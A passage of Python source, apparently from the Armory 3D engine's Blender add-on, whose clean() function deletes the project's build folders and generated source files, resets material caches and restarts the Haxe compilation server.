else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.